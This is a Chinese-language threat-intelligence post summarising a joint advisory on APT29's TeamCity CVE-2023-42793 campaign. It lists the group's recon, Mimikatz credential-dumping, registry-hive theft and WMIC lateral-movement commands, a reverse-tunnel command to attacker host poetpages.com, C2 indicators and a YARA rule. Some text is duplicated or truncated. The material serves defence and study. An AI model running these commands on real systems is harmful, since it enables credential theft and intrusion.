APT29 最新技战术分享

admin 2023年12月16日20:40:54评论15 views字数 8567阅读28分33秒阅读模式

特点

近期APT29TTP手法更新如下:

  • Kerberoasting

  • Golden Tickets 定向伪造

  • SQL server存储procedures 以保持持久性。

  • 自带易受攻击的驱动程序 // Disabling EDR

  • DLL hijacking

  • CVE-2023-42793 RCE

Cozy Bear 简介

俄罗斯外国情报局 (SVR) 网络攻击者 — 也称为APT29、Dukes、CozyBear 和 NOBELIUM/Midnight Blizzard — 正在利用 CVE-2023-42793 自 2023 年 9 月起大规模对托管 JetBrains TeamCity 软件的服务器进行攻击。软件开发人员使用 TeamCity 软件来管理和自动化软件编译、构建、测试、发布。如果受到威胁,对 TeamCity 服务器的访问将提供恶意攻击者

Initial Access - Exploitation

APT29 于 9 月底开始利用连接互联网的 JetBrains TeamCity 服务器 [T1190 CVE-2023-42793,RCE。

Host Reconnaissance

  1. whoami /priv

  2. whoami /all

  3. whoami /groups

  4. whoami /domain

  5. nltest -dclist

  6. nltest -dsgetdc

  7. tasklist

  8. netstat

  9. wmic /node:""<redacted>"" /user:""<redacted>"" /password:""<redacted>"" process list brief

  10. wmic /node:""<redacted>"" process list brief

  11. wmic process get commandline -all

  12. wmic process <proc_id> get commandline

  13. wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed

  14. powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties

  15. powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties.memberof

  16. powershell Get-WmiObject -Class Win32_Service -Computername

  17. powershell Get-WindowsDriver -Online -All

File Exfiltration

C:Windowssystem32ntoskrnl.exe 用于精确识别系统版本,可能是部署 EDRSandBlast 的先决条件。 SQL Server 可执行文件 - 根据对后渗透行为的审查,APT29 对受损系统上安装的 SQL Server 的特定文件表现出兴趣:

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqlmin.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllos.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllang.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqltses.dll

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsecforwarder.dll

Visual Studio 文件 - 根据对后渗透行为的审查,APT29 对 Visual Studio 的特定文件表现出兴趣:

C:Program Files (x86)Microsoft Visual Studio2017SQLCommon7IDEVSIXAutoUpdate.exe

更新管理代理文件 - 根据对后渗透行为的审查,APT29 对补丁管理软件的可执行文件和配置表现出兴趣:

C:Program Files (x86)PatchManagementInstallationAgent12Httpdbinhttpd.exe

C:Program Files (x86)PatchManagementInstallationAgent12Httpd

C:ProgramDataGFILanGuard 12HttpdConfighttpd.conf

Interest in SQL Server

  1. # 使用PowerShell进行文件压缩

  2. Compress-Archive -Path "C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqlmin.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllos.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllang.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqltses.dll" -DestinationPath C:Windowstemp1sql.zip

  3. # APT29网络攻击者还渗透了 secforwarder.dll 文件

Avoid Detection

为了避免被检测,APT29使用了“Bring Your Own Vulnerable Driver” [T1068] 技术,以禁用或直接终止端点检测和响应(EDR)以及防病毒(AV)软件 [T1562.001]。这是通过使用一个名为“EDRSandBlast”的开源项目完成的。编写机构观察到APT29使用EDRSandBlast去除了受保护的进程轻量级(PPL)保护,该保护用于控制和保护运行中的进程,使其免受感染。攻击者随后在一小部分受害者中向AV/EDR进程注入代码[T1068]。此外,执行可能被检测到的可执行文件(即Mimikatz)时,这些文件是在内存中执行的[T1003.001]。在几个案例中,APT29尝试通过以下方式隐藏他们的后门:

  • 滥用Zabbix软件中的DLL劫持漏洞,通过将一个包含GraphicalProton后门的合法Zabbix DLL替换为他们自己的DLL来隐藏后门。

  • 在Microsoft开发的名为vcperf的开源应用程序中植入后门。APT29修改并复制了公开可用的源代码。在执行后,带后门的vcperf将几个DLL文件写入磁盘,其中之一是GraphicalProton后门。

  • 滥用Webroot防病毒软件中的DLL劫持漏洞,通过将一个包含GraphicalProton后门的合法DLL替换为他们自己的DLL来隐藏后门。

为了避免被网络监控检测,APT29设计了一个秘密的C2通道,使用Microsoft OneDrive和Dropbox云服务。为了进一步实现混淆,通过OneDrive和Dropbox与恶意软件交换的数据被隐藏在随机生成的BMP文件中[T1564].

Privilege Escalation

为了促进特权升级 [T1098],APT29使用了多种技术,包括WinPEAS、NoLMHash注册表键修改和Mimikatz工具。

APT29使用以下reg命令修改NoLMHash注册表:

  1. powershellCopy code

  2. reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa /v NoLMHash /t REG_DWORD /d "0" /f

APT29使用以下Mimikatz命令 [T1003]:

  1. plaintextCopy codeprivilege::debug

  2. lsadump::cache

  3. lsadump::secrets

  4. lsadump::sam

  5. sekurlsa::logonpasswords

持久性 APT29依赖于计划任务 [T1053.005] 来确保后门的持久执行。根据APT29所具有的权限,它们的可执行文件存储在以下其中一个目录中:

  • C:Windowstemp

  • C:WindowsSystem32

  • C:WindowsWinStore

APT29使用schtasks.exe二进制文件进行所有修改。然后,它有多个schtasks.exe传递的参数变体,可以在附录B - 指标中找到。

为了确保对环境的长期访问,APT29使用Rubeus工具包来制作票证授予票证 (TGTs) [T1558.001]。

Persistence

APT29依赖于计划任务 [T1053.005] 来确保后门的持久执行。根据APT29所具有的权限,它们的可执行文件存储在以下其中一个目录中:

  • C:Windowstemp

  • C:WindowsSystem32

  • C:WindowsWinStore

APT29使用schtasks.exe二进制文件进行所有修改。然后,它有多个schtasks.exe传递的参数变体,可以在附录B - 指标中找到。

为了确保对环境的长期访问,APT29使用Rubeus工具包来制作票证授予票证 (TGTs) [T1558.001]。

敏感数据泄露 [T1020] APT29从受害者那里泄露了以下Windows注册表hive [T1003]:

  • HKLMSYSTEM

  • HKLMSAM

  • HKLMSECURITY

为了泄露Windows注册表,APT29将hives保存到文件中 [T1003.002],将它们打包,然后使用后门功能泄露它们。它使用“reg save”保存SYSTEM、SAM和SECURITY注册表hive,并使用powershell在C:WindowsTemp目录中制作.zip档案。

  1. powershellCopy codereg save HKLMSYSTEM "C:Windowstemp1sy.sa" /y

  2. reg save HKLMSAM "C:Windowstemp1sam.sa" /y

  3. reg save HKLMSECURITY "C:Windowstemp1se.sa" /y

  4. powershell Compress-Archive -Path C:Windowstemp1 -DestinationPath C:Windowstemps.zip -Force & del C:Windowstemp1 /F /Q

在一些特定情况下,APT29使用SharpChromium工具获取敏感的浏览器数据,例如会话cookie、浏览历史或已保存的登录信息。

APT29还使用DSInternals开源工具与目录服务进行交互。DSInternals允许获取敏感的域信息。

Network Reconnaissance

在APT29建立了安全立足点并了解了受害者的TeamCity服务器后,它将重心转向网络侦查 [T1590.004]。APT29使用内置命令和其他工具进行网络侦查,例如端口扫描器和PowerSploit,并将它们加载到内存中 [T1046]。APT29执行了以下PowerSploit命令:

  • Get-NetComputer

  • Get-NetGroup

  • Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount

  • Get-NetDiDomain

  • Get-AdUser

  • Get-DomainUser -UserName

  • Get-NetUser -PreauthNotRequire

  • Get-NetComputer | select samaccountname

  • Get-NetUser -SPN | select serviceprincipalname

渗透受害环境 在选择的环境中,APT29使用一个名为“rr.exe”的附加工具,这是一个修改过的开源反向Socks隧道工具(Rsockstun)来建立到C2基础设施的隧道 [T1572]。编写机构知道与“rr.exe”一起使用的以下基础设施:

  • 65.20.97[.]203:443

  • Poetpages[.]com:8443

APT29执行Rsockstun时,它可以在内存中执行,也可以在将其放置到磁盘后使用Windows Management Instrumentation Command Line (WMIC) [T1047]实用程序执行:

  1. powershellCopy code

  2. wmic process call create "C:Program FilesWindows Defender Advanced Threat ProtectionSense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"

横向移动 APT29使用WMIC促进了横向移动 [T1047],[T1210]。

  1. powershellCopy code

  2. wmic /node:""<redacted>"" /user:""<redacted>" /password:""<redacted>"" process call create ""rundll32 C:Windowssystem32AclNumsInvertHost.dll AclNumsInvertHost""

APT29还修改了DisableRestrictedAdmin键以启用远程连接 [T1210]。它使用以下reg命令修改注册表:

  1. powershellCopy code

  2. reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa /v DisableRestrictedAd

Adversary Toolset

在TeamCity操作中,APT29使用了多个定制和开源可用的工具和后门。在操作期间观察到了以下自定义工具:

  • GraphicalProton: 这是一个简单的后门,使用OneDrive、Dropbox和随机生成的BMP图像 [T1027.001] 与APT29操作员交换数据。

  • 在执行后,GraphicalProton收集环境信息,如活动的TCP/UDP连接 [T1049]、运行中的进程 [T1049] 以及用户、主机和域名 [T1590]。OneDrive被用作主要通信通道,而Dropbox则被视为备用通道 [T1567]。API密钥被硬编码到恶意软件中。与云服务通信时,GraphicalProton生成一个随机命名的目录,用于存储特定感染的BMP文件 - 包含命令和结果 [T1564.001]。每次启动GraphicalProton进程时,目录名称都会重新随机化。

  • 用于交换数据的BMP文件生成方式如下:

    1. 使用zlib压缩数据,

    2. 使用自定义算法加密数据,

    3. 在加密的数据中添加“*”字符串文字,

    4. 创建一个带有随机矩形的随机BMP,

    5. 最后,在较低像素位中编码加密的数据。

  • 虽然GraphicalProton后门在我们追踪的几个月里基本上没有变化,为了避免检测,对手将该工具包装在各种不同层次的混淆、加密、编码器和分段器中。两个特定的GraphicalProton“包装”变体尤其值得注意 - 一种变体使用Zabbix中的DLL劫持 [T1574.002] 作为启动执行的手段(并可能提供长期、难以检测的访问),另一种变体将自身掩藏在vcperf [T1036] 中,这是Microsoft的开源C++构建分析工具。

  • GraphicalProton HTTPS变体: 这是APT29最近引入的GraphicalProton后门的一个变体,放弃使用基于云的服务作为C2通道,而是依赖于HTTP请求。

    • 为了合法化C2通道,APT29使用重新注册的已过期域名设置了一个带有虚假WordPress网站的域。GraphicalProton的HTTPS变体的执行分为两个文件 - 分段器和包含进一步代码的加密二进制文件。

YARA

  1. rule APT29_GraphicalProton {

  2. strings:

  3. // C1 E9 1B shr ecx, 1Bh

  4. // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]

  5. // 8B 50 04 mov edx, [rax+4]

  6. // C1 E2 05 shl edx, 5

  7. // 09 D1 or ecx, edx

  8. // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]

  9. $op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 |

  10. 08 | 10 | 0d | 07) 09 ?? 48 }

  11. // 48 05 20 00 00 00 add rax, 20h ; ' '

  12. // 48 89 C1 mov rcx, rax

  13. // 48 8D 15 0A A6 0D 00 lea rdx, unk_14011E546

  14. // 41 B8 30 00 00 00 mov r8d, 30h ; '0'

  15. // E8 69 B5 FE FF call sub_14002F4B0

  16. // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]

  17. // 48 05 40 00 00 00 add rax, 40h ; '@'

  18. // 48 89 C1 mov rcx, rax

  19. // 48 8D 15 1B A6 0D 00 lea rdx, unk_14011E577

  20. // 41 B8 70 01 00 00 mov r8d, 170h

  21. // E8 49 B5 FE FF call sub_14002F4B0

  22. // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]

  23. International Partnership

  24. Page 22 of 27 | Product ID: AA23-347A

  25. TLP:CLEAR

  26. TLP:CLEAR

  27. // 48 05 60 00 00 00 add rax, 60h ; '`'

  28. // 48 89 C1 mov rcx, rax

  29. // 48 8D 15 6C A7 0D 00 lea rdx, unk_14011E6E8

  30. // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'

  31. // E8 29 B5 FE FF call sub_14002F4B0

  32. // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]

  33. // 48 05 80 00 00 00 add rax, 80h

  34. // 48 89 C1 mov rcx, rax

  35. // 48 8D 15 7C A7 0D 00 lea rdx, unk_14011E718

  36. // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'

  37. // E8 09 B5 FE FF call sub_14002F4B0

  38. // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]

  39. // 48 05 A0 00 00 00 add rax, 0A0h

  40. $op_decrypt_config = {

  41. 48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]

  42. 48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]

  43. 48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]

  44. 48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]

  45. 48 05 A0 00 00 00

  46. }

  47. condition:

  48. all of them

  49. }

参考链接

• NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks • CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise International Partnership • CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud • CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies,Critical Infrastructure, and Private Sector Organizations • CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing  • FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors  • CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development • NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development


原文始发于微信公众号(TIPFactory情报工厂):APT29 最新技战术分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月16日20:40:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   APT29 最新技战术分享https://cn-sec.com/archives/2304424.html

发表评论

匿名网友 填写信息